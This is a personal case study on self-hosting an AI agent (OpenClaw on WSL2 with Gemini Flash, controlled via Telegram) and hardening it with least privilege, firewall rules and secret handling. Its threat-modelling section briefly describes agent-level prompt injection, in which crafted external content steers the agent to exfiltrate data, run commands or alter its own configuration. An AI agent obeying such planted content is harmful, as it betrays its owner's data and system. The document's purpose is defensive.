YOOLBOT — Building a 24/7 AI Companion on a Hardened Home Server

How I converted a wiped laptop into a hardened, always-on AI server — running OpenClaw on WSL2, a Gemini Flash backend, and a Telegram command interface — and why I treated every component as a potential attack surface from day one.

TL;DR

01 — Background

Why I Built This

The idea behind YOOLBOT came from a simple frustration: I wanted an AI assistant that was actually mine — not a SaaS endpoint I was renting access to, not something that reset its context every session, and not something living on hardware I shared with personal data. I wanted persistent, always-on compute under my control.

As someone building a career in security, I also wanted to understand what running an internet-connected AI agent actually looks like from a threat modelling perspective. It's easy to talk about attack surfaces in theory. Running your own is a different exercise entirely. So this project served two purposes: build something useful, and deliberately stress-test my own infrastructure decisions.

The name YOOLBOT comes from YOOL — Your Own Ongoing Legacy — the same philosophy behind the broader project of documenting what I build. The bot was meant to be an extension of that: a persistent digital companion that could work autonomously and be reached at any time.


02 — Architecture

How It's Built

The hardware is a dedicated laptop, fully wiped and rebuilt from scratch. The decision to wipe was deliberate — not just for cleanliness, but as a security posture decision. Any existing software, credentials, cached tokens, or residual data from a previous life as a personal machine becomes an attack surface. Starting from zero removes that entire class of risk.

Request flow
📱 Telegram (mobile)
Telegram API servers
VPS relay (static IP)
YOOLBOT host (WSL2)
YOOLBOT host (WSL2)
OpenClaw runtime
Gemini Flash API
Cron scheduler
Autonomous background tasks

Windows + WSL2 as the base

The host OS is Windows, with WSL2 running the Linux environment where YOOLBOT actually lives. This isn't the most elegant setup from a purist perspective — a bare-metal Linux install would be simpler — but WSL2 provides a meaningful security boundary between the agent runtime and the host OS. If the WSL2 environment were compromised, the blast radius is partially contained by the hypervisor separation. It also allowed for a familiar management layer on the Windows side while keeping the bot sandboxed in a clean Linux environment.

OpenClaw as the agent runtime

OpenClaw acts as the orchestration layer — managing the agent loop, tool dispatch, and context handling. It's what gives YOOLBOT the ability to do more than just respond to messages. With cron jobs wired in, YOOLBOT could execute scheduled tasks entirely independently: pulling data, running checks, logging outputs — all without me initiating a conversation.

Gemini Flash as the LLM backend

The intelligence layer runs through Google's Gemini Flash API. The API key lives in a .env file, never hardcoded into the source. This is a basic but non-negotiable practice — API keys in source code is one of the most common and avoidable exposure vectors, and treating secrets as configuration rather than code is a discipline worth building from the start.

Telegram as the command interface

Telegram was the right choice here for several reasons. The bot API uses long polling — the bot reaches out to Telegram's servers to check for messages rather than exposing a port that Telegram pushes to. This means no inbound connection needed from the open internet directly to the host machine. Telegram also handles its own authentication layer, so access to the bot is gated behind my Telegram account credentials and optionally a bot token whitelist. From my phone, I have a full terminal-like interface wherever I am.

VPS relay for external connectivity

Rather than port-forwarding directly from my home router — which would expose my home IP and require opening inbound ports — I routed traffic through a VPS with a static IP. The home machine connects outbound to the VPS; the VPS terminates external traffic. This keeps the home machine's IP undisclosed and means no inbound ports need to be opened at the router level. It's a meaningful reduction in exposure even though it adds a hop.


03 — Threat Modelling

OpenClaw: The Security Considerations

OpenClaw is the component that required the most careful thinking. As an agentic AI framework — one capable of executing tools, running shell commands, reading and writing files, and making outbound network requests — it is by design a powerful and permissive runtime. That power is also its attack surface. Before deploying it, I tried to reason through what could go wrong.

Critical Risk Class

Agentic AI runtimes like OpenClaw operate with elevated trust by design — they are built to take actions, not just produce text. Any vulnerability that allows an attacker to influence the agent's input or tool dispatch is potentially equivalent to arbitrary code execution on the host. This threat class deserves the same severity rating as an RCE vulnerability.

Prompt injection via external data

If YOOLBOT were configured to consume external data — RSS feeds, web pages, emails, API responses — a malicious actor could craft content designed to hijack the agent's behaviour. This is prompt injection at the agentic level: instead of just extracting information from the model, an attacker could potentially instruct it to exfiltrate data, execute commands, or modify its own configuration. The mitigation here is strict input scoping — YOOLBOT only processes inputs I send it directly through Telegram, from an authenticated account. No external data ingestion pipelines were wired in.

Residual Risk

Even with Telegram as the sole input source, if my Telegram account were compromised, an attacker would inherit full control of YOOLBOT's command interface. This is why Telegram account security — strong password, 2FA enabled — is load-bearing for this entire architecture.

Tool and shell execution scope

OpenClaw's ability to run shell commands is its most powerful feature and its most dangerous one. I constrained this by running the bot as a dedicated non-root user inside the WSL2 environment. The user has no sudo access. This means that even if the agent were manipulated into attempting a destructive operation, it cannot escalate to root. It cannot modify system files, install packages system-wide, or interact with the Windows host at the hypervisor level.

bash# Create a dedicated low-privilege user for the bot
sudo adduser yoolbot --disabled-password
sudo usermod -s /bin/bash yoolbot

# Confirm no sudo access
sudo -l -U yoolbot
# Expected: User yoolbot is not allowed to run sudo on this host.

# Run the bot as the dedicated user
su -c "cd /home/yoolbot/yoolbot && python main.py" yoolbot

API key and secret exposure

Two secrets needed protecting: the Gemini Flash API key and the Telegram bot token. Both live in a .env file that is never committed to any repository and is readable only by the yoolbot user. The .gitignore is set to exclude .env files at the project root. The risk of key exposure is not just financial — a leaked Gemini API key means an attacker can run inference at your cost and, depending on API permissions, potentially access usage logs or quota information.

bash# Lock .env to the bot user only
chmod 600 /home/yoolbot/yoolbot/.env
chown yoolbot:yoolbot /home/yoolbot/yoolbot/.env

# Verify
ls -la /home/yoolbot/yoolbot/.env
# -rw------- 1 yoolbot yoolbot ... .env

Network exposure and port discipline

One of the first things I did on the fresh install was audit what was listening on the network. Open ports are open doors. WSL2 by default may expose services on the host's network interface, and Windows itself runs several services that bind to ports. The principle here is simple: if a service isn't needed, it shouldn't be running, and if a port isn't needed, it shouldn't be open.

powershell — windows host# Audit all listening ports on the Windows host
netstat -ano | findstr LISTENING

# Cross-reference with running processes
Get-NetTCPConnection -State Listen | Select-Object LocalPort, OwningProcess |
  ForEach-Object { $p = Get-Process -Id $_.OwningProcess -EA 0;
  [PSCustomObject]@{Port=$_.LocalPort; Process=$p.Name} } | Sort Port
bash — wsl2 environment# Check what's listening inside WSL2
ss -tlnp

# Block everything incoming, allow established outbound
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw enable
sudo ufw status verbose
WSL2 Networking Note

WSL2 runs inside a Hyper-V VM with its own virtual network interface. UFW rules set inside WSL2 apply to that interface, but they don't control Windows Firewall on the host. Both layers need to be configured independently. I treated them as separate security boundaries and hardened each one.

Cron job attack surface

Cron jobs run on a schedule without user interaction, which means they need to be treated as an elevated-risk execution context. A misconfigured cron job running as root, or one that calls an external script that an attacker could modify, is a privilege escalation vector. My cron jobs run as the yoolbot user, call only scripts I control, and are scoped to read-only operations or write operations within a tightly bounded directory.

bash — crontab for yoolbot user# Edit as the bot user, not root
crontab -u yoolbot -e

# Example: run a scheduled check every hour
0 * * * * /home/yoolbot/yoolbot/scripts/hourly_check.sh >> /home/yoolbot/logs/cron.log 2>&1

# Ensure scripts are not world-writable
chmod 750 /home/yoolbot/yoolbot/scripts/hourly_check.sh
chown yoolbot:yoolbot /home/yoolbot/yoolbot/scripts/hourly_check.sh

The "what if the laptop itself is compromised" question

This is the question that drove the decision to wipe the machine entirely before starting. A laptop with a history — personal browsing, saved credentials, old tokens in browser storage — is a risk even before you run anything new on it. Starting from a known-clean state means you can reason about what's on the machine because you built it from scratch. You know every piece of software that was installed. You know every service that was enabled. The threat model is tractable.

The absence of personal data on the machine is also load-bearing. If YOOLBOT were somehow exploited and the host compromised, there's nothing to exfiltrate beyond the bot's own operational data. No documents, no saved passwords, no browser history. The blast radius is bounded.


04 — Risk Register

Threat Summary

A structured breakdown of the threats I identified and the mitigations I put in place.

Threat Severity Vector Mitigation Status
Prompt injection via agent input High Malicious Telegram message / external data Input source locked to authenticated Telegram account only. No external data ingestion. Mitigated
Shell command escalation via OpenClaw High Agent tool misuse / manipulation Bot runs as dedicated non-root yoolbot user with no sudo access. Mitigated
API key / bot token exposure High Accidental repo commit, file permission misconfiguration .env file chmod 600, excluded from version control via .gitignore. Mitigated
Telegram account takeover High Phishing / SIM swap / credential theft Strong password + 2FA on Telegram account. No recovery phone as sole factor. Mitigated
Open port exploitation on host Medium Network scanning / service exploitation UFW default-deny inbound on WSL2. Windows Firewall reviewed and hardened on host. VPS relay hides home IP. Mitigated
Unnecessary services exposing attack surface Medium Default OS services running on unused ports Services audited post-install. Non-essential Windows features disabled. WSL2 services reviewed. Mitigated
Cron job privilege escalation Medium World-writable scripts, misconfigured crontab Cron runs as yoolbot user. All scripts chmod 750, owned by yoolbot. Mitigated
VPS relay compromise Medium Weak VPS credentials, unpatched software SSH key auth only on VPS, password auth disabled. Regular patching cadence. Ongoing
Gemini API abuse / quota hijacking Low Leaked API key used by third party Key scoped to minimum required permissions. Usage monitoring via Google Cloud console. Mitigated
WSL2 escape to Windows host Low WSL2 hypervisor vulnerability WSL2 kept updated. Windows host patched. No sensitive data on host to exfiltrate regardless. Monitored
Personal data residue on host Low Pre-existing data surviving wipe Full drive wipe before installation. Machine has never held personal data in its current state. Mitigated

05 — Reflections

What I Learned

Agentic AI is a new attack surface class

Working with OpenClaw made it concrete in a way that reading about it doesn't: an AI agent that can execute tools is categorically different from a chatbot. The threat model for a chatbot is mostly about data leakage and model manipulation. The threat model for an agent is closer to that of a server process with elevated permissions. It needs to be treated accordingly — principle of least privilege, input validation, blast radius minimisation.

The wipe decision was the right one

Starting from a clean install might seem like overkill for a personal project, but it's actually one of the highest-leverage security decisions you can make. It eliminates an entire category of unknown unknowns. You can't enumerate what you don't know is there. A clean baseline means you can reason about what's running on your machine, and that tractability is valuable.

Infrastructure security is inseparable from application security

It would have been easy to focus only on the bot code and treat the host as someone else's problem. But the host is never someone else's problem when you're running it yourself. The firewall rules, the user permissions, the port audit — these aren't separate concerns from the bot's security. They're the same concern expressed at different layers. Defence in depth only works if you actually build the depth.

Key Takeaway

The most effective security decisions in this project weren't clever — they were disciplined. A dedicated non-root user. Secrets in .env. Default-deny firewall. A wiped host. These aren't advanced techniques. They're fundamentals applied consistently. Most real-world security failures aren't failures of sophistication — they're failures of consistency.


← Back to Case Studies Get in Touch →